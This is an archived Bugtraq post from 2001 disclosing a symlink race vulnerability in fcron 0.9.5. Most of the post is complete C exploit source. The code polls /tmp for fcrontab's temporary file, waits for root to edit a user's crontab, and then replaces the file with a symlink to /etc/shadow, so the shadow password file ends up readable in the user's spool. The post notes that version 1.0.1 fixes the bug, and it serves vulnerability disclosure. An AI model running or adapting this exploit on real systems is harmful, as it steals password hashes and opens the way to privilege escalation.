Bugtraq mailing list archives
fcron 0.9.5 is vulnerable to a symlink attack
From: kiss from Helisec <NIKEBOY () RETEMAIL ES>
Date: Wed, 28 Feb 2001 21:30:18 +0100
What we need: we need that root updates our crontab file ( # fcrontab -u kiss -e) What we get: we get written /etc/shadow in our crontab file (or any other file we want) This is just a proof of concept. What we have to do is run the exploit above from a normal user shell. Then, in a root console, we update that user's crontab. After that, just check the contents of <user>.orig and you'll find /etc/shadow right there :-). /* -------------------------- fcrontab exploit by _kiss_ -------------------------- */ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <time.h> #include <dirent.h> #define TRUE 1 void main() { struct stat buf; time_t modif1,modif2; DIR *dir; struct dirent *direntry; int found=0; char string[200]; char string2[200]; printf ("---------------------------------------------\n"); printf (" fcrontab exploit by _kiss_\n"); printf (" Helios Security and Administration (HeliSec)\n\n"); printf (" Greets: Jet-Li (for teaching me some lessons of shell\n"); printf (" that i will need someday) :D\n"); printf ("---------------------------------------------\n"); /* we wait till /tmp/fcrontab is created */ printf("\nwaiting for /tmp/fcrontab to be created...\n"); while(!found) { dir=opendir("/tmp"); while ((direntry=readdir(dir))!=NULL) { if (strncmp("fcrontab",direntry->d_name,8)==0) found=1; if (found==1) break; } closedir(dir); } strcpy(string,"/tmp/"); strcat(string,direntry->d_name); while (TRUE) { if (stat(string,&buf)!=-1) break; } /* we store date of last modification */ printf("/tmp/fcrontab created. waiting for the update...\n"); modif1=buf.st_mtime; /* we wait till /tmp/fcrontab is updated */ do { stat(string,&buf); modif2=buf.st_mtime; } while (modif1==modif2); /* we make the symlink */ printf("making a symlink to /etc/shadow...\n"); strcpy(string2,"ln -fs /etc/shadow "); strcat(string2,string); system(string2); /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */ printf("... now check /var/spool/fcron/kiss.orig\n"); } NOTE: a new version has been released to correct this bug (1.0.1), and it can be found at fcron.free.fr _kiss_ from HeliSec
Current thread:
- fcron 0.9.5 is vulnerable to a symlink attack kiss from Helisec (Feb 28)